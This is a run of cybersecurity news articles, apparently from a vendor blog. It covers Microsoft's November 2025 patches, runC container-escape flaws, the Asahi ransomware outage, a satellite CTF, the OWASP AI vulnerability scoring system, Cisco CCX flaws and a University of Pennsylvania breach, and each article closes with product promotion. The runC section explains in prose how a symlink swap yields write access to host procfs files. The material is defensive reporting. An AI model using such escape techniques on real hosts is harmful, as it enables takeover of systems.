The most urgent issue this month is CVE-2025-62215, an Elevation of Privilege vulnerability in the Windows Kernel. According to Microsoft, the flaw arises from a race condition that allows an authenticated attacker to gain SYSTEM-level privileges on affected systems.  In Microsoft’s technical explanation, “concurrent execution using a shared resource with improper synchronization” could let an attacker win a race condition and escalate privileges locally. This vulnerability was discovered by the Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC). While the company has confirmed that it is being exploited in the wild, it has not provided details about the attack methods or affected threat actors.  The vulnerability notes a recurring challenge for Windows systems: race conditions within kernel operations can provide attackers with direct pathways to full administrative control if not properly mitigated. Patching this CVE should therefore be a top priority for enterprise and government environments. 

Other High-Severity CVEs and Products Affected 

Beyond the zero-day, four additional vulnerabilities have been classified as Critical. These include remote code execution vulnerabilities in components like Microsoft Office and Visual Studio, which could allow attackers to execute malicious code if users open specially crafted files or interact with compromised projects. 

• CVE-2025-62199: A critical RCE vulnerability in Microsoft Office that can trigger upon viewing or opening a malicious document. This flaw is particularly dangerous because it can be exploited through the Outlook Preview Pane, requiring no additional user interaction. 
• CVE-2025-60724: A heap-based buffer overflow in the Microsoft Graphics Component (GDI+) that could potentially allow remote code execution across multiple applications. 
• CVE-2025-62214: A Visual Studio CoPilot Chat extension flaw enabling remote code execution through a complex multi-stage exploitation chain involving prompt injection and build triggering. 
• CVE-2025-59499: An elevation of privilege issue in Microsoft SQL Server that enables attackers to execute arbitrary Transact-SQL commands with elevated permissions. 

The November Patch Tuesday also covers vulnerabilities across a variety of Microsoft services, including Azure Monitor Agent, Windows DirectX, Windows OLE, Dynamics 365, OneDrive for Android, and several networking components such as WinSock and RRAS (Routing and Remote Access Service).  While five of these vulnerabilities are rated “Critical,” most are considered “Important,” reflecting Microsoft’s evaluation of exploitation complexity and impact. Nonetheless, even lower-rated CVEs can pose severe threats when combined with social engineering or used in chained attacks. 

Windows 11 Updates and Lifecycle Changes 

Alongside security fixes, the November 2025 Windows 11 Patch Tuesday (build 26200.7121, update KB5068861) introduces new features and UI enhancements. These include a redesigned Start menu that allows more app pinning, a customizable “All Apps” view, and visual changes to the Taskbar’s battery icon, which can now display color indicators and percentage values.  The update also resolves several performance and stability issues, such as Task Manager continuing to run in the background after closure, and connectivity problems in certain gaming handheld devices. Storage reliability, HTTP request parsing, and voice access setup have also been improved.  Additionally, this update coincides with the end of support for Windows 11 Home and Pro version 23H2, making a small but notable shift in Microsoft’s lifecycle policy. Users running older CPUs that lack support for the new instruction sets required by Windows 11 24H2 may need to consider hardware upgrades or extended support programs. 

The Importance of Prompt Patching 

November’s updates, though fewer in number, address several vulnerabilities with serious potential consequences if left unpatched. Administrators are urged to prioritize systems exposed to the internet or running affected components, especially those related to the Windows Kernel, Microsoft Office, and Visual Studio.  With one confirmed exploited zero-day and multiple critical RCE vulnerabilities, Microsoft Patch Tuesday for November 2025 serves as a reminder that timely patch deployment remains one of the most effective defenses against cyber threats. Organizations should also monitor system logs and intrusion detection systems for signs of exploitation and ensure that legacy or unsupported devices receive compensating controls.  The November Patch Tuesday highlights the nature of vulnerabilities that can harm even the most protected systems. With an actively exploited zero-day and several critical vulnerabilities addressed, timely patching remains essential for reducing cyber risk.  To strengthen defenses beyond standard patch cycles, organizations can leverage Cyble’s Vulnerability Management platform. Cyble continuously monitors emerging exploits and zero-day vulnerabilities, providing in-depth intelligence that helps teams prioritize patching by risk level and uncover issues not listed even in the most popular databases. Its insights into exploitation methods, dark web chatter, and mitigation options enable proactive threat prevention. Want to find vulnerabilities before threat actors do?   Schedule a personalized demo today and see how Cyble can enhance your organization’s security posture. 

Security researchers have revealed three serious vulnerabilities in runC, the Open Container Initiative (OCI)-compliant runtime that powers platforms such as Docker and Kubernetes, which could allow attackers to break container isolation and gain control of the host system. The flaws, tracked as CVE-2025-31133, CVE-2025-52565, and CVE-2025-52881, stem from weaknesses in how runC manages temporary bind mounts, symbolic links (symlinks), and certain write operations. Together, they can be exploited to achieve complete container escapes and even host-level compromises.  According to the U.S. National Vulnerability Database (NVD) and the runC project’s own advisories, these vulnerabilities arise from logic and race-condition errors within runC’s path resolution and mount handling. The issue occurs when runC attempts to mask access to restricted files by bind-mounting safe inodes such as /dev/null or /dev/console.   If an attacker introduces a symlink or triggers a race condition during container initialization, the runtime may accidentally mount an attacker-specified target path, granting write access to critical host system files. This misconfiguration can expose kernel interfaces such as /proc/sys/kernel/core_pattern or /proc/sysrq-trigger, which, if modified, can be used to crash the host or escape the container environment entirely.  Aleksa Sarai, a developer at SUSE and member of the OCI Technical Board, explained that runC’s method for masking files is vulnerable because of how it interacts with symbolic links during initialization. “If an attacker places a symlink at the right time, runC may inadvertently mount an attacker-defined target, creating dangerous write access to critical kernel interfaces in /proc,” Sarai warned. The advisories emphasize that all three vulnerabilities could permit full container breakouts by bypassing runC’s intended restrictions. 

Details of all the Vulnerabilities: CVE-2025-31133, CVE-2025-52565 and CVE-2025-52881 

CVE-2025-31133 involves how runC implements “masked paths.” When the runtime bind-mounts /dev/null over a file to block access, an attacker can replace /dev/null with a symlink to a sensitive host file. This can cause runC to mount that host path as read-write, enabling an attacker to alter kernel parameters or trigger system crashes through /proc/sysrq-trigger. This vulnerability impacts all known versions of runC before the latest patches.  CVE-2025-52565 is a similar issue that targets /dev/console mounts. When runC attempts to bind /dev/console to /dev/pts/$n, an attacker who replaces /dev/pts/$n with a symlink can cause the bind-mount to target a different file. This vulnerability affects all versions of runC from 1.0.0-rc3 onward. Like CVE-2025-31133, it can be exploited to create read-write binds to critical procfs files, resulting in container breakout. The flaw has a CVSS score of 7.3.  While addressing CVE-2025-52565, developers also identified potential risks in how runC used file creation functions. Though these were not directly exploitable, fixes were included as a precaution. Additional mitigations were also applied to reduce race conditions in /dev/pts/$n, even though they are largely hypothetical in most deployments. CVE-2025-52881 represents a more advanced attack vector that builds on previous runC vulnerabilities. It allows an attacker to redirect write operations within procfs, bypassing Linux Security Module (LSM) protections such as AppArmor and SELinux. This could enable malicious writes to files like /proc/sysrq-trigger, causing host crashes, or to /proc/sys/kernel/core_pattern, facilitating a container escape. This vulnerability affects all known versions of runC and has a CVSS score of 7.3. Researchers note that CVE-2025-52881 can pair with the other two flaws to simplify exploitation, acting as an LSM bypass that allows arbitrary writes to host files. 

Fixes, Versions, and Mitigation 

The vulnerabilities have been addressed in runC v1.2.8, v1.3.3, and v1.4.0-rc.3. The patches introduce extensive code changes not only to runC itself but also to the supporting library filepath-securejoin, which handles secure path resolution. Maintainers strongly advise vendors and users to upgrade directly to these versions rather than applying individual patches, as the fixes are interdependent and cover overlapping issues across the three CVEs.  Recommended mitigations include: 

• By preventing the host root user from being mapped inside the container, unauthorized writes to procfs files are blocked by standard Unix permissions. 
• Containers should be configured with restricted privileges, and setuid binaries should be disabled using the noNewPrivileges flag. 
• SELinux may help limit exposure in certain cases, but CVE-2025-52881 can bypass LSM protections, making AppArmor or SELinux alone insufficient. 

While these mitigations reduce exposure, immediate upgrades remain the most effective defense. The advisories caution that CVE-2025-52881 can undermine even strong LSM-based defenses if the runtime is not patched. 

Conclusion 

The recent runC vulnerabilities and coordinated fixes across runtimes demonstrate the critical need for proactive, intelligence-driven cybersecurity. Organizations using Docker, Kubernetes, or other OCI-based platforms should promptly upgrade to the patched versions (v1.2.8, v1.3.3, or v1.4.0-rc.3) and carefully review container privileges to reduce risk. The research contributions from Lei Wang, Li Fubang, Tõnis Tiigi, and Aleksa Sarai highlight the importance of cross-runtime collaboration to prevent container escapes.  Complementing these efforts, Cyble’s AI-Native Threat Intelligence Platform, including Blaze AI, provides autonomous monitoring of vulnerabilities, threat prediction, and remediation, enabling security teams to stay ahead of attacks, protect critical assets, and maintain security defenses in complex containerized environments.  Book a personalized demo to see how Cyble can detect threats and protect your assets in real time. 

As Japan enters its busiest beer-drinking period, the nation’s biggest brewer, Asahi Group Holdings Ltd., continues to face the brunt of the Asahi cyberattack that has crippled its operations for more than a month. The Asahi cyberattack, identified as a ransomware incident, has severely disrupted the company’s internal systems that manage online orders and shipments, forcing the brewer to fall back on manual processes and slow production to a near standstill.  According to company representatives, Asahi’s shipments have dropped to just 10 percent of normal levels as the firm processes orders in person, over the phone, and even by fax, a throwback to pre-digital business methods. The disruption comes at a critical time: December typically marks Asahi’s strongest sales period, with its signature Super Dry beer accounting for 12 percent of annual sales.  Industry analysts expect that the beer shipment data for October, due out on Thursday, will shed light on how much market share Asahi may have lost to competitors in the wake of the attack, as reported by China Daily. 

The Asahi Cyberattack Supply Struggles Hit Bars and Restaurants 

The impact of the Asahi cyberattack has been felt sharply across Tokyo’s bustling bar scene. In Shimbashi, Kohei Matsuo, owner of Bier Reise ’98, said that 80 percent of his beer sales once came from Asahi’s Maruefu brand. Within a week of the attack, he was out of stock and had to pivot to other domestic and imported beers.  “If supply doesn’t recover and I have to suspend the all-you-can-drink plan, it’s likely to hurt year-end party attendance,” Matsuo said.  Meanwhile, in Ueno, Hiroyuki Iida, manager of Izakaya Ueno Ichiba Honten, said his restaurant briefly switched to products from Sapporo Holdings Ltd. and Suntory Holdings Ltd. before receiving limited shipments of Super Dry. However, other Asahi items, including Maruefu and its non-alcoholic beers, remain unavailable.  “Wholesalers may be prioritizing larger volume accounts,” Iida noted, adding that the damage has been somewhat milder than initially feared. 

Rivals Step In 

Competitors have been quick to seize the opportunity. Kirin Holdings Co., Suntory, and Sapporo have been replacing Asahi-branded taps, glassware, and other bar equipment through wholesalers — moves that could make it harder for Asahi to reclaim its presence once supply stabilizes. Analyst Euan Mcleish of Sanford C. Bernstein Japan believes Sapporo stands to gain the most, thanks to its full-malt beer lineup.  Following the October 6 attack, Asahi even lost its No. 1 position in Japan’s retail beer market to Kirin, driven by a surge in sales of Kirin’s Ichiban Shibori brand, according to Nikkei point-of-sale data.  Kirin has adjusted its shipments to ensure a stable supply as demand grows, while Suntory confirmed receiving numerous distributor inquiries and is scaling production. Sapporo also reported ramping up shipments to meet stronger-than-expected demand. 

Retail Market Offers Mixed Picture 

Despite the widespread disruption, retail stores show a more varied situation. Some OK Corp outlets in central Tokyo continue to stock Super Dry and Maruefu, though shelves for other Asahi products are emptying fast. Major convenience store chains such as Seven & i Holdings Co., FamilyMart Co., and Lawson Inc. still have a steady supply of Super Dry, though shortages of soft drinks and energy beverages from Monster Beverage Corp., which Asahi distributes, are becoming noticeable.  Online retailers show a similar pattern: Amazon Japan lists a 24-pack of Super Dry for ¥5,040, while Aeon Co. offers a 10-can gift set for ¥2,380, with delivery scheduled between December 1 and January 10. In contrast, department stores such as Isetan Mitsukoshi Holdings Ltd. and Takashimaya Co. list many Asahi beer gifts as sold out, a setback for Japan’s year-end gifting tradition, when premium food and beverages are exchanged to express gratitude. 

Financial Fallout and Future Risks 

The Asahi cyberattack highlights how even major corporations can falter when outdated systems meet modern threats. Analyst Euan Mcleish predicts a ¥15 billion fourth-quarter loss and a 13 percent profit shortfall, while experts like Professor Tetsutaro Uehara point to Asahi’s fragmented legacy systems as a key weakness exploited during the cyberattack on Asahi.   To prevent similar crises, organizations must embrace AI-native cybersecurity built for today’s threat landscape. Platforms like Cyble, recognized by Gartner and Forrester, autonomously predict, hunt, and neutralize attacks before they strike. Businesses can book a free demo or start a complimentary external threat assessment with Cyble to uncover vulnerabilities and experience how AI that hunts, thinks, and protects keeps them a step ahead of the next cyber threat. 

D-Orbit and the ethical hacking collective mhackeroni have concluded CTRLSpace CTF, the first in-orbit satellite cybersecurity competition ever held in Europe. The event, organized with the support of the European Space Agency’s (ESA) Security Cyber Centre of Excellence and ESA’s Security Office, marked a major step toward strengthening Europe’s space defence capabilities.  The final phase of the CTF (Capture the Flag) competition took place from 4–6 November at ESA’s ESTEC facility in the Netherlands, coinciding with the Security for Space Systems (3S) conference. For the first time, contestants engaged directly with operational spacecraft, the ION Satellite Carrier, in a live environment designed to simulate real-world cybersecurity threats in orbit. 

A New Era in Space Security with CTF 

The CTRLSpace CTF competition aimed to confront one of the fastest-growing challenges in the modern space economy: protecting satellites and orbital infrastructure from cyberattacks. According to D-Orbit, the event demonstrated not only the feasibility of in-orbit cybersecurity testing but also the urgent need to integrate protection mechanisms into every phase of satellite design.  “Cybersecurity has become a fundamental pillar of the new space economy,” said Grazia Bibiano, D-Orbit’s Country Leader for Portugal. “At D-Orbit, we integrate it from the very first design stages because security cannot be an add-on; it must be built into the DNA of every system we send into orbit.”  Davide Avanzi, D-Orbit’s Head of Space and Product Security, echoed this sentiment, emphasizing the complexity of the task: “Protecting space infrastructure is one of the most complex engineering challenges of our time. By adopting a security-by-design approach, we ensure mission resilience, data integrity, and trust in the space services of the future.” 

From Hundreds of Teams to One Winner 

The competition attracted immense global interest. A total of 559 teams registered for the qualifying round, with 299 solving at least one challenge. Over 25 tasks, participants collectively submitted 660 correct flags, showcasing a wide range of cybersecurity expertise.  From this large pool, five finalist teams advanced to the live finals at ESA ESTEC. These top competitors were given the rare opportunity to test their skills against actual spacecraft systems. Using secure, isolated environments, the event employed three active ION satellites to deliver authentic telemetry data and command interfaces.  The finalists had to decode real telemetry, send command sequences, analyze orbital positions, and interact with onboard software to uncover vulnerabilities, an experience that mirrored genuine satellite operations. Ultimately, the team Superflat emerged victorious, securing the top spot in this historic satellite cybersecurity competition. 

Testing the Future of Space Defense 

According to Daniele Lain from mhackeroni, developing challenges for a space-based environment required unprecedented innovation. “The space environment poses unique issues to the development of engaging challenges,” he noted, highlighting the technical and logistical hurdles faced during the design of the CTF tasks.  Antonios Atlasis, Head of the System Security Section at ESA, noted the broader implications of the event. “Cybersecurity protection of space missions is not an option,” he stated.   “The successful implementation and execution of CTRLSpace CTF not only provided the unique opportunity for students from all over Europe to compete on cybersecurity challenges implemented in real satellites, but it also proved that the implementation of cybersecurity protection measures in satellites is possible, even for the most challenging security scenarios.” 

A new vulnerability scoring system has just been announced. The initiative, called the AI Vulnerability Scoring System (AIVSS), aims to fill the gaps left by traditional models such as the Common Vulnerability Scoring System (CVSS), which were not designed to handle the complex, non-deterministic nature of modern AI technologies.  AI security expert, author, and adjunct professor Ken Huang introduced the AIVSS framework, emphasizing that while CVSS has long been a cornerstone for assessing software vulnerabilities, it fails to capture the unique threat landscape presented by agentic and autonomous AI systems.  “The CVSS and other regular software vulnerability frameworks are not enough,” Huang explained. “These assume traditional deterministic coding. We need to deal with the non-deterministic nature of Agentic AI.”  Huang serves as co-leader of the AIVSS project working group alongside several prominent figures in cybersecurity and academia, including Zenity Co-Founder and CTO Michael Bargury, Amazon Web Services Application Security Engineer Vineeth Sai Narajala, and Stanford University Information Security Officer Bhavya Gupta.   Together, the group has collaborated under the Open Worldwide Application Security Project (OWASP) to develop a framework that provides a structured and measurable approach to assessing AI-related security threats.  According to Huang, Agentic AI introduces unique challenges because of its partial autonomy. “Autonomy is not itself a vulnerability, but it does elevate risk,” he noted. The AIVSS is designed specifically to quantify those additional risk factors that emerge when AI systems make independent decisions, interact dynamically with tools, or adapt their behavior in ways that traditional software cannot. 

A New Approach to AI Vulnerability Scoring 

The AI Vulnerability Scoring System builds upon the CVSS model, introducing new parameters tailored to the dynamic nature of AI systems. The AIVSS score begins with a base CVSS score and then incorporates an agentic capabilities assessment. This additional layer accounts for autonomy, non-determinism, and tool use, factors that can amplify risk in AI-driven systems. The combined score is then divided by two and multiplied by an environmental context factor to produce a final vulnerability score.  A dedicated portal, available at aivss.owasp.org, provides documentation, structured guides for AI risk assessment, and a scoring tool for practitioners to calculate their own AI vulnerability scores.  Huang highlighted a critical difference between AI systems and traditional software: the fluidity of AI identities. “We cannot assume the identities used at deployment time,” he said. “With agentic AI, you need the identity to be ephemeral and dynamically assigned. If you really want to have autonomy, you have to give it the privileges it needs to finish the task.”  

Top Risks in Agentic AI Systems 

The AIVSS project has also identified the ten most severe core security risks for Agentic AI, though the team has refrained from calling it an official “Top 10” list. The current risks include: 

• Agentic AI Tool Misuse 
• Agent Access Control Violation 
• Agent Cascading Failures 
• Agent Orchestration and Multi-Agent Exploitation 
• Agent Identity Impersonation 
• Agent Memory and Context Manipulation 
• Insecure Agent Critical Systems Interaction 
• Agent Supply Chain and Dependency Attacks 
• Agent Untraceability 
• Agent Goal and Instruction Manipulation 

Each of these risks reflects the interconnected and compositional nature of AI systems. As the draft AIVSS document notes, “Some repetition across entries is intentional. Agentic systems are compositional and interconnected by design. To date, the most common risks such as Tool Misuse, Goal Manipulation, or Access Control Violations, often overlap or reinforce each other in cascading ways.”  Huang provided an example of how this manifests in practice: “For tool misuse, there shouldn’t be a risk in selecting a tool. But in MCP systems, there is tool impersonation, and also insecure tool usage.” 

Cisco has issued an urgent security advisory detailing two critical vulnerabilities affecting its Unified Contact Center Express (Unified CCX) platform. The flaws, identified as CVE-2025-20354 and CVE-2025-20358, could allow unauthenticated remote attackers to execute arbitrary code, bypass authentication, and potentially gain root-level access to affected systems.  The vulnerabilities were disclosed in the advisory cisco-sa-cc-unauth-rce-QeN8h7mQ, published on November 5, 2025, at 16:00 GMT. Cisco has classified both flaws as critical with a CVSS base score of 9.8 and 9.4, respectively. According to the company, no workarounds currently exist, making software updates the only effective remediation. 

Details of the Vulnerabilities: 2025-20354 and CVE-2025-20358

Cisco confirmed that the issues reside within the Java Remote Method Invocation (RMI) process and CCX Editor components of Unified CCX. Both vulnerabilities are independent, meaning one does not need to be exploited before the other can be used.  CVE-2025-20354 is a remote code execution vulnerability stemming from improper authentication mechanisms within certain Unified CCX features. It allows an unauthenticated, remote attacker to upload arbitrary files and execute commands with root privileges. An attacker could exploit this flaw by sending a crafted file through the Java RMI process, effectively taking full control of the underlying operating system.  This vulnerability, tracked under Cisco Bug ID CSCwq36528, received a CVSS score of 9.8, placing it among the highest severity levels. Cisco warned that successful exploitation could lead to complete system compromise, including the ability to elevate privileges to root.  The second flaw, CVE-2025-20358, affects the CCX Editor application. This authentication bypass vulnerability arises from weaknesses in how the CCX Editor communicates with the Unified CCX server. An attacker could manipulate this process by redirecting authentication to a malicious server, deceiving the system into accepting unauthorized access.  If successfully exploited, this vulnerability could enable an attacker to create and execute arbitrary scripts within the affected environment using an internal non-root account. Although this vulnerability is slightly less severe than the RCE flaw, its CVSS score of 9.4 still categorizes it as critical. The issue is documented under Cisco Bug ID CSCwq36573. 

Impacted Products and Workarounds

Cisco stated that all versions of Unified CCX are vulnerable, regardless of device configuration. The company confirmed that its Packaged Contact Center Enterprise (Packaged CCE) and Unified Contact Center Enterprise (Unified CCE) products are not affected by CVE-2025-20354 or CVE-2025-20358.  Cisco’s advisory noted that no workarounds or temporary mitigations are available for these vulnerabilities. The company strongly urges all customers to apply the newly released software updates as the only permanent solution.  To fully remediate the flaws, Cisco recommends upgrading to fixed releases as follows: 

• Unified CCX 12.5 SU3 ES07 (and earlier versions) 
• Unified CCX 15.0 ES01 

The Cisco Product Security Incident Response Team (PSIRT) validated the fixed versions and confirmed that these are the earliest builds containing the necessary patches. 

No Known Exploitation Yet

As of publication, Cisco’s PSIRT reported no evidence of public exploitation or malicious activity related to CVE-2025-20354 or CVE-2025-20358.   However, given the critical nature and remote attack vector of these vulnerabilities, security experts warn that exploitation attempts could surface soon after disclosure.  Cisco credited security researcher Jahmel Harris for responsibly reporting the issues. The company’s acknowledgment reinforces the importance of coordinated vulnerability disclosure in protecting enterprise environments from high-impact cyber threats. 

The University of Pennsylvania has confirmed that a hacker stole sensitive university data during a recent cyberattack. The breach, first detected on October 31, 2025, resulted in unauthorized access to systems connected to the university’s development and alumni activities.  Initially, the University of Pennsylvania dismissed reports of a hack as “fraudulent.” However, officials later acknowledged that data was indeed taken. In a statement released to alumni and shared publicly, the university explained that staff “rapidly locked down the systems and prevented further unauthorized access; however, not before an offensive and fraudulent email was sent to our community and information was taken by the attacker.” 

The University of Pennsylvania Breach and Attack Details

The attackers gained access through a social engineering technique, a method that deceives individuals into revealing their credentials. Once inside, the hackers sent a mass email from official university addresses. The email read: “We got hacked. We love breaking federal laws like FERPA (all your data will be leaked). Please stop giving us money.”  According to reports, the hackers compromised a PennKey single sign-on account, which allowed them access to multiple internal systems, including the university’s VPN, Salesforce databases, SAP systems, and SharePoint files. This access reportedly lasted for nearly two days, from October 30 to October 31, before being detected and contained.  An internal source revealed that the university requires multi-factor authentication (MFA) for students, staff, and alumni accounts as a security measure. However, some senior officials were allegedly granted exemptions from the MFA requirement.  When asked about the MFA exemptions or adoption rates, a university spokesperson declined to comment beyond the official data incident page. 

Scope of the Data Theft

While the full scope of the data breach remains unclear, reports suggest that as many as 1.2 million records may have been compromised. The stolen data reportedly includes names, contact details, donation records, estimated net worth, and demographic information such as race, religion, and sexual orientation. The hacker also claimed to have accessed documents related to donor activities and bank transaction receipts.  Although the university is still assessing the damage, officials confirmed that medical systems operated by Penn Medicine were not affected. As required by law, the university will contact individuals whose personal data was compromised, though no timeline has been announced. 

Investigation and Legal Fallout

The University of Pennsylvania has reported the incident to the Federal Bureau of Investigation (FBI) and enlisted third-party cybersecurity experts to assist in the investigation. Despite these actions, the university is already facing potential legal consequences. At least one class-action lawsuit has been filed by former students, accusing the university of negligence in protecting personal data.  The hackers’ motivations appear mixed. In the initial message to the university community, the attackers criticized legacy admissions and affirmative action policies, stating, “We hire and admit morons because we love legacies, donors, and unqualified affirmative action admits.” However, further statements from the group indicate their primary motive was financial, aiming to profit from the stolen data rather than make a political statement.